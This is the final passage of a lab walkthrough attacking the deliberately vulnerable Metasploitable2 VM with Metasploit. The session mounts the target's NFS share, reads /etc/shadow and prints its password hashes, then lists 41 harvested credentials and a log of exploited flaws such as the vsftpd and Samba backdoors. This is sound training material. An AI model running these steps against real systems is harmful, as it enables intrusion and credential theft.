msf> mount -o nolock 10.10.10.200:/ /media/nfs
[*] exec: mount -o nolock 10.10.10.200:/ /media/nfs
 
msf> ls /media/nfs
[*] exec: ls /media/nfs
 
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
msf> cat /media/nfs/etc/shadow
[*] exec: cat /media/nfs/etc/shadow
 
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
sync:*:14684:0:99999:7:::
games:*:14684:0:99999:7:::
man:*:14684:0:99999:7:::
lp:*:14684:0:99999:7:::
mail:*:14684:0:99999:7:::
news:*:14684:0:99999:7:::
uucp:*:14684:0:99999:7:::
proxy:*:14684:0:99999:7:::
www-data:*:14684:0:99999:7:::
backup:*:14684:0:99999:7:::
list:*:14684:0:99999:7:::
irc:*:14684:0:99999:7:::
gnats:*:14684:0:99999:7:::
nobody:*:14684:0:99999:7:::
libuuid:!:14684:0:99999:7:::
dhcp:*:14684:0:99999:7:::
syslog:*:14684:0:99999:7:::
klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::
sshd:*:14684:0:99999:7:::
msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:14684:0:99999:7:::
bind:*:14685:0:99999:7:::
postfix:*:14685:0:99999:7:::
ftp:*:14685:0:99999:7:::
postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:14685:0:99999:7:::
mysql:!:14685:0:99999:7:::
tomcat55:*:14691:0:99999:7:::
distccd:*:14698:0:99999:7:::
user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7:::
service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7:::
telnetd:*:14715:0:99999:7:::
proftpd:!:14727:0:99999:7:::
statd:*:15474:0:99999:7:::
snmp:*:15480:0:99999:7:::
msf>

Another way to get the hashes and also to cause all sorts of other mischief. Now one port we have not had a look at is port 80..
msf> links http://10.10.10.200 -dump
[*] exec: links http://10.10.10.200 -dump
 
 
                 _                  _       _ _        _     _      ____
  _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \
 | '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |
 | | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/
 |_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|
                             |_|
 
 
 Warning: Never expose this VM to an untrusted network!
 
 Contact: msfdev[at]metasploit.com
 
 Login with msfadmin/msfadmin to get started
 
 
 
     * TWiki
     * phpMyAdmin
     * Mutillidae
     * DVWA
     * WebDAV
 
 
msf> links http://10.10.10.200 -source
[*] exec: links http://10.10.10.200 -source
 
<html><head><title>Metasploitable2 - Linux</title></head><body>
<pre>
 
                _                  _       _ _        _     _      ____
 _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|
                            |_|
 
 
Warning: Never expose this VM to an untrusted network!
 
Contact: msfdev[at]metasploit.com
 
Login with msfadmin/msfadmin to get started
 
 
</pre>
<ul>
<li><a href="/twiki/">TWiki</a></li>
<li><a href="/phpMyAdmin/">phpMyAdmin</a></li>
<li><a href="/mutillidae/">Mutillidae</a></li>
<li><a href="/dvwa/">DVWA</a></li>
<li><a href="/dav/">WebDAV</a></li>
</ul>
</body>
</html>
 
msf>

We can see the msfadmin/msfadmin credentials again. Also 'mutillidae' and 'dvwa' are target environments in their own right and deserve their own model answers. PHPMyAdmin can be used since you have credentials for it, and I have not seen working metasploit modules for twiki and PHPMyAdmin. So after all this, what can we get from our database?
msf > creds
 
Credentials
===========
 
host          port  user                pass                                                                        type         active?
----          ----  ----                ----                                                                        ----         -------
10.10.10.200  22                        /root/.msf4/loot/20130606121732_default_10.10.10.200_ssh.id_dsa_110756.txt  ssh_key      true
10.10.10.200  23    postgres            postgres                                                                    password     true
10.10.10.200  23    msfadmin            msfadmin                                                                    password     true
10.10.10.200  23    user                user                                                                        password     true
10.10.10.200  513   proftpd                                                                                         password     true
10.10.10.200  513   statd                                                                                           password     true
10.10.10.200  513   snmp                                                                                            password     true
10.10.10.200  513   msfadmin                                                                                        password     true
10.10.10.200  513   user                                                                                            password     true
10.10.10.200  513   service                                                                                         password     true
10.10.10.200  5900                      password                                                                    password     true
10.10.10.200  22                        /root/.msf4/loot/20130606121730_default_10.10.10.200_ssh.id_rsa_972813.txt  ssh_key      true
10.10.10.200  8180  tomcat              tomcat                                                                      password     true
10.10.10.200  23    service             service                                                                     password     true
10.10.10.200  21    anonymous           mozilla@example.com                                                         password_ro  true
10.10.10.200  21    postgres            postgres                                                                    password     true
10.10.10.200  21    msfadmin            msfadmin                                                                    password     true
10.10.10.200  21    user                user                                                                        password     true
10.10.10.200  21    service             service                                                                     password     true
10.10.10.200  22    postgres            postgres                                                                    password     true
10.10.10.200  22    msfadmin            msfadmin                                                                    password     true
10.10.10.200  22    user                user                                                                        password     true
10.10.10.200  22    service             service                                                                     password     true
10.10.10.200  513   root                                                                                            password     true
10.10.10.200  513   nobody                                                                                          password     true
10.10.10.200  513   proxy                                                                                           password     true
10.10.10.200  513   backup                                                                                          password     true
10.10.10.200  513   syslog                                                                                          password     true
10.10.10.200  513   klog                                                                                            password     true
10.10.10.200  513   ftp                                                                                             password     true
10.10.10.200  513   postgres                                                                                        password     true
10.10.10.200  513   mysql                                                                                           password     true
10.10.10.200  513   tomcat55                                                                                        password     true
10.10.10.200  513   distccd                                                                                         password     true
10.10.10.200  513   telnetd                                                                                         password     true
10.10.10.200  2121  postgres            postgres                                                                    password     true
10.10.10.200  2121  msfadmin            msfadmin                                                                    password     true
10.10.10.200  2121  user                user                                                                        password     true
10.10.10.200  2121  service             service                                                                     password     true
10.10.10.200  3306  root                                                                                            password     true
10.10.10.200  5432  template1/postgres  postgres                                                                    password     true
 
[*] Found 41 credentials.
 
msf > vulns
[*] Time: 2013-06-06 03:18:13 UTC Vuln: host=10.10.10.200 name=Telnet Login Check Scanner refs=CVE-1999-0502
[*] Time: 2013-06-06 12:49:29 UTC Vuln: host=10.10.10.200 name=rlogin Authentication Scanner refs=CVE-1999-0502,CVE-1999-0651
[*] Time: 2013-06-06 12:36:38 UTC Vuln: host=10.10.10.200 name=SSH Login Check Scanner refs=CVE-1999-0502
[*] Time: 2013-06-06 16:03:22 UTC Vuln: host=10.10.10.200 name=VSFTPD v2.3.4 Backdoor Command Execution refs=OSVDB-73573,
URL-http://pastebin.com/AetT9sS5,URL-http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
[*] Time: 2013-06-06 16:11:31 UTC Vuln: host=10.10.10.200 name=Samba "username map script" Command Execution
refs=CVE-2007-2447,OSVDB-34700,BID-23972,URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534,
URL-http://samba.org/samba/security/CVE-2007-2447.html
[*] Time: 2013-06-06 16:30:08 UTC Vuln: host=10.10.10.200 name=PostgreSQL for Linux Payload Execution
refs=URL-http://www.leidecker.info/pgshell/Having_Fun_With_PostgreSQL.txt
[*] Time: 2013-06-06 16:37:46 UTC Vuln: host=10.10.10.200 name=UnrealIRCD 3.2.8.1 Backdoor Command Execution
refs=CVE-2010-2075,OSVDB-65445,URL-http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt
[*] Time: 2013-06-06 16:39:38 UTC Vuln: host=10.10.10.200 name=Apache Tomcat Manager Application Deployer Authenticated Code Execution
refs=CVE-2009-3843,OSVDB-60317,CVE-2009-4189,OSVDB-60670,CVE-2009-4188,BID-38084,CVE-2010-0557,
URL-http://www-01.ibm.com/support/docview.wss?uid=swg21419179,CVE-2010-4094,URL-http://www.zerodayinitiative.com/advisories/ZDI-10-214/,CVE-2009-3548,
OSVDB-60176,BID-36954,URL-http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html
[*] Time: 2013-06-06 16:15:06 UTC Vuln: host=10.10.10.200 name=Java RMI Server Insecure Default Configuration Java Code Execution
refs=URL-http://download.oracle.com/javase/1.3/docs/guide/rmi/spec/rmi-protocol.html,MSF-java_rmi_server
msf >


I have probably missed a module or two, but we have covered off a lot of the basics of metasploit and shown that there can be multiple ways to exploit a single target. Give it a go and see what you come up with. Have fun and learn.